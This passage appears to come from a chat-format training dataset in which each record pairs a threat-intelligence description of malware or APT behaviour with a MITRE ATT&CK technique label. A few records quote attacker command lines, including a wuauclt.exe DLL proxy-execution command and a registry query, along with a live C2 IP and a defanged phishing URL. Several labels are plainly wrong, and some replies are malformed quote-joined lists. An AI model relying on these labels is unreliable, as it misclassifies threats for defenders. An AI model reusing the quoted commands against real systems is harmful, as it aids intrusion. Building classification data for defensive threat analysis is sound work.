- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PlayList.vbs contains the obfuscated codes, which it executes after decrypting the obfuscations."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects the current username from the victim."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has gathered credentials from the Windows Credential Manager tool."
- },
- {
- "role": "assistant",
- "content": "T1555.004 - Credentials from Password Stores: Windows Credential Manager"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tomiris has connected to a signalization server that provides a URL and port, and then Tomiris sends a GET request to that URL to establish C2."
- },
- {
- "role": "assistant",
- "content": "T1568 - Dynamic Resolution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gazer injects its communication module into an Internet accessible process through which it performs C2."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can execute commands using a shell."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The image displayed to the user after mounting the DMG appears to be the “Install” file. In actuality, it is just a system link that points to the 1302.app application bundle, or the malicious application itself. By double-clicking the “Install” image in Figure C, the system actually executes the 1302.app, where 1302.app/Contents/MacOS/1302 is just a bash script"
- },
- {
- "role": "assistant",
- "content": "T1553.001 - Subvert Trust Controls: Gatekeeper Bypass"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This can be complemented by restricting direct internet access to the company’s internal networks while using proxies to access external resources"
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Along the way, HermeticWiper’s more mundane operations provide us with further IOCs to monitor for. It also modifies several registry keys, including setting the SYSTEM\\CurrentControlSet\\Control\\CrashControl CrashDumpEnabled key to 0, effectively disabling crash dumps before the abused driver’s execution starts"
- },
- {
- "role": "assistant",
- "content": "T1562.006 - Impair Defenses: Indicator Blocking', 'T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During our investigation of one of the compromised servers we found an application that, at first glance, appeared to be a legitimate SSH server called Dropbear SSH"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading', 'T1021 - Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Also, the x command will delete the generated registry key and the Office365DCOMCheck/SystemDiskClean scheduled task"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has used AES to encrypt C2 responses."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KGH_SPY can send a file containing victim system information to C2."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The C2 domain used in this shellcode has been categorized as malware in DNS Security, URL Filtering and WildFire, which are security subscriptions for Next-Generation Firewall customers. App-ID, the traffic classification system in Next-Generation Firewalls, is capable of identifying applications irrespective of port, protocol, encryption (SSH or SSL) or any other evasive tactic used by the application. This shellcode attempts to communicate over TCP port 443 with traffic that does not conform to proper SSL or any other known application. As a matter of best practice, we advise customers to block unknown outbound TCP traffic in their security policies"
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Skidmap has the ability to install several loadable kernel modules (LKMs) on infected machines."
- },
- {
- "role": "assistant",
- "content": "T1547.006 - Boot or Logon Autostart Execution: Kernel Modules and Extensions"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GrimAgent can identify the country code on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1614 - System Location Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The lnk file (WindowsUpdateConf.lnk) executes “C:\\Windows\\system32\\wuauclt.exe” /UpdateDeploymentProvider C:\\Wíndows\\system32\\wuaueng.dll /RunHandlerComServer. This is an interesting technique used by Lazarus to run its malicious DLL using the Windows Update Client to bypass security detection mechanisms"
- },
- {
- "role": "assistant",
- "content": "T1218 - Signed Binary Proxy Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Meteor can use `wmic.exe` as part of its effort to delete shadow copies."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pisloader has commands to list drives on the victim machine and to list file information for a given directory."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 used different compromised credentials for remote access and to move laterally."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "checks the Registry key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings for proxy configurations information."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As soon as the user enabled the macro, a robust Visual Basic Application (VBA) script began to execute. First, it would query Windows Management Instrumentation (WMI) to check if any of the following applications were running"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo has used MSI files to download additional files to execute."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lizar has used various Windows API functions on a victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attackers also used a malicious tool that they named BCS-server. This tool allows them to open a tunnel into an internal network and then this tunnel can be used to send and receive data between the C&C server and even non-infected computers in the network. The main idea of this tool is based on the same principles as the XTUNNEL malware used by the Sednit group"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attor can download additional plugins, updates and other files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The implant consists of a modified Cisco IOS image that allows the attacker to load different functional modules from the anonymity of the internet. Each of the modules are enabled via the HTTP protocol (not HTTPS), using a specifically crafted TCP packets sent to the routers interface. The packets have a nonstandard sequence and corresponding acknowledgment numbers. The modules can manifest themselves as independent executable code or hooks within the routers IOS that provide functionality similar to the backdoor password"
- },
- {
- "role": "assistant",
- "content": "T1205 - Traffic Signaling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sowbug has used keylogging tools."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has used \"reg query “HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default”\" on a victim to query the Registry."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent Tesla can gather credentials from a number of browsers."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has copied and installed tools for operations once in the victim environment."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FoggyWeb has been XOR-encoded."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NoComm – No command, which causes the script to keep sending POST requests. Base64 string – A module to execute. The module is encrypted with a simple substitution cipher and encoded in base64"
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hydraq uses svchost.exe to execute a malicious DLL included in a new service group."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "YAHOYAH uses HTTP GET requests to download other files that are executed in memory."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can move laterally using worm-like functionality through exploitation of SMB."
- },
- {
- "role": "assistant",
- "content": "T1210 - Exploitation of Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 used RDP to move laterally in victim networks."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This RAT communicates with 5.189.145.248, a command and control (C2) IP address that this group has used previously with other malware, including DarkComet and NJRAT"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can upload and download to and from a victim machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crimson RAT can steal credentials from browsers, collect antivirus information, capture screenshots, and list victim drives, processes, and directories. We have observed how an infected host communicates with a Crimson RAT C&C server to send exfiltrated information including PC name, operating system (OS) information, and the location of the Crimson RAT malware inside the system."
- },
- {
- "role": "assistant",
- "content": "T1592 - Gather Victim Host Information', 'T1589 - Gather Victim Identity Information', 'T1590 - Gather Victim Network Information', 'T1125 - Video Capture', 'T1555.003 - Credentials from Password Stores: Credentials from Web Browsers', 'T1056 - Input Capture', 'T1113 - Screen Capture', 'T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KGH_SPY has the ability to set the \"HKCU\\Environment\\UserInitMprLogonScript\" Registry key to execute logon scripts."
- },
- {
- "role": "assistant",
- "content": "T1037.001 - Boot or Logon Initialization Scripts: Logon Script (Windows)"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkHydrus has sent spearphishing emails with password-protected RAR archives containing malicious Excel Web Query files (.iqy). The group has also sent spearphishing emails that contained malicious Microsoft Office documents that use the “attachedTemplate” technique to load a template from a remote server."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can accept multiple URLs for C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The configuration data used by the backdoor has the following structure: #pragma pack(push, 1) struct st_cncconfig { _WORD id; _BYTE byte2; _BYTE byte3; _QWORD pCnCBeg; _QWORD pCnCEnd; _QWORD pLastElement; }; #pragma pack(pop) To be able to enter the data into the database, Linux.BackDoor.Fysbis.1 converts the configuration data into the following structure: #pragma pack(push, 1) struct st_crypted_config_data { _WORD id; _BYTE byte2; _BYTE byte3; char* pCnC; }; #pragma pack(pop) Before the configuration data is encrypted with the RC4 algorithm, 11 signature bytes are added to the end of the data (11 bytes are stored in the backdoor's body)"
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System', 'T1140 - Deobfuscate/Decode Files or Information', 'T1027.002 - Obfuscated Files or Information: Software Packing', 'T1041 - Exfiltration Over C2 Channel', 'T1560 - Archive Collected Data', 'T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has used spearphishing emails to deliver BrainTest as a malicious attachment."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "communicates to its C2 server over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Additional tools were recovered during the incident, including a network scanning/enumeration tool, the archiving tool WinRAR and a bespoke Microsoft SharePoint enumeration and data dumping tool, known as 'spwebmember'"
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NanHaiShu executes additional Jscript code on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADNEWS creates a scheduled task to establish by executing a malicious payload every subsequent minute."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Azorult can collect host IP information from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chrommme can download its code from C2."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Winnti Group used stolen certificates to sign its malware."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Javali can monitor processes for open browsers and custom banking applications."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One variant of BlackEnergy locates existing driver services that have been disabled and drops its driver component into one of those service's paths, replacing the legitimate executable. The malware then sets the hijacked service to start automatically to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1574.010 - Services File Permissions Weakness"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chaes can download additional files onto an infected machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CreepyDrive can use OneDrive for C2."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gold Dragon collects endpoint information using the \"systeminfo\" command."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a sophisticated keylogger."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RobbinHood will search for Windows services that are associated with antivirus software on the system and kill the process."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "11 bytes of this buffer are encrypted with the XOR algorithm as follows: i = 0 while ( 1 ) { crypted_buffer = (_BYTE *)this_->crypted_buffer; if ( i gt;= this-gt;crypted_buffer_size - 4 ) // this-gt;crypted_buffer_size == 15 break; ++i; crypted_buffer[i + 4] ^= crypted_buffer[i & 3]; The generated buffer in encoded using the BASE64 alphabet, where the last two characters are replaced with “-” and “_”"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LitePower can use a PowerShell script to execute commands."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "’s Java payload is encrypted with AES."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The main infection vector for Poseidon is the use of spear-phishing emails including RTF/DOC files, usually with a human resources lure. Poseidon’s toolkit displays an awareness of many antivirus providers over the years, attempting to attack or spoof these processes as a means of self-defense for their infections"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 12 and Figure 13 show the RSA keys used in FELIXROOT, and Figure 14 shows the AES encryption parameters"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used XOR with 0x90 to obfuscate its configuration file."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "On February 12, 2018 at 16:45 (all times are in the organization’s local time), an email was sent to the organization advertising a job vacancy at an American global service provider. The email contained a malicious link to hxxp://mynetwork.ddns[DOT].net:880"
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shamoon creates a new service named “ntssrv” to execute the payload. Shamoon can also spread via PsExec."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "obtained OS version and hardware configuration from a victim."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OnionDuke uses HTTP and HTTPS for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We found that a domain admin account was compromised and the Active Directory audit tool PingCastle was run. Using the domain admin, the actor was able to compromise several other accounts and execute malicious services and persistence mechanisms, namely SDBbot RAT Loaders"
- },
- {
- "role": "assistant",
- "content": "T1078.002 - Domain Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Backdoor.Oldrea can download additional modules from C2."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MoonWind installs itself as a new service with automatic startup to establish persistence. The service checks every 60 seconds to determine if the malware is running; if not, it will spawn a new instance."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
